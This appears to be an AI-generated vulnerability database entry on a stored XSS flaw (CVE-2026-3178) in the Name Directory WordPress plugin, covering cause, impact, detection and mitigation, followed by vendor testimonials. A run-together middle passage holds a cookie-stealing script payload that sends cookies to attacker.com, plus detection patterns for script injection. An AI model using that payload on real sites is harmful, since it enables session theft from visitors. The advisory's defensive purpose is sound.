
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3178 is a Stored Cross-Site Scripting (XSS) vulnerability in the Name Directory plugin for WordPress, affecting all versions up to and including 1.32.1. The flaw exists in the name_directory_name parameter due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts that execute when any user visits an affected page. The vulnerability was disclosed on March 11, 2026, and carries a CVSS v3.1 base score of 7.2 (High) (Wordfence, RedHat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The name_directory_name parameter in the plugin's admin interface fails to properly sanitize user-supplied input before storing it in the database and fails to escape it on output, enabling persistent script injection. Because no authentication is required to trigger the vulnerable code path, any remote attacker can submit a crafted payload that is subsequently rendered in the browser of any visitor to the affected page. Relevant source code locations include admin.php lines 930–931 and helpers.php line 602 in the plugin's repository (Wordfence, Plugin Trac).
Successful exploitation allows unauthenticated attackers to persistently inject malicious JavaScript into WordPress pages served to all site visitors, impacting both confidentiality and integrity. Injected scripts can be used to steal session cookies, redirect users to phishing sites, harvest credentials, or perform actions on behalf of authenticated users (including administrators). While availability is not directly impacted, a compromised administrator session could lead to full site takeover and further lateral movement within the hosting environment (Wordfence, RedHat CVE).
No public exploit code or active in-the-wild exploitation has been reported as of the time of this report. The EPSS score is approximately 0.07%, indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the unauthenticated nature of the attack vector significantly lowers the barrier for exploitation, making it accessible to low-skilled attackers (Wordfence).
wp-content/plugins/name-directory/.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>, to be injected via the name_directory_name parameter.name_directory_name parameter, embedding the malicious script in the field value.name_directory_name parameter.<script>, %3Cscript%3E, javascript:) in parameter values.wp-content/plugins/name-directory/ that may indicate secondary compromise following session hijacking.The vulnerability was partially patched in versions 1.30.3 and 1.32.1, but these patches are noted as incomplete. Site administrators should update the Name Directory plugin to the latest available version beyond 1.32.1 once a fully patched release is available, and monitor the plugin's changelog for a complete fix (Plugin Changeset). As an interim workaround, consider disabling the Name Directory plugin until a complete patch is confirmed, or restrict access to the plugin's input forms using a Web Application Firewall (WAF) rule that blocks script injection patterns in the name_directory_name parameter. Wordfence users benefit from built-in firewall rules that may block exploitation attempts (Wordfence).
The vulnerability was reported and assigned by Wordfence, which included it in their weekly WordPress vulnerability report for March 9–15, 2026 (Wordfence Blog). Security aggregators including RedPacket Security and INCIBE-CERT published alerts shortly after disclosure. Community reaction has been limited, consistent with the moderate severity and niche plugin scope.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."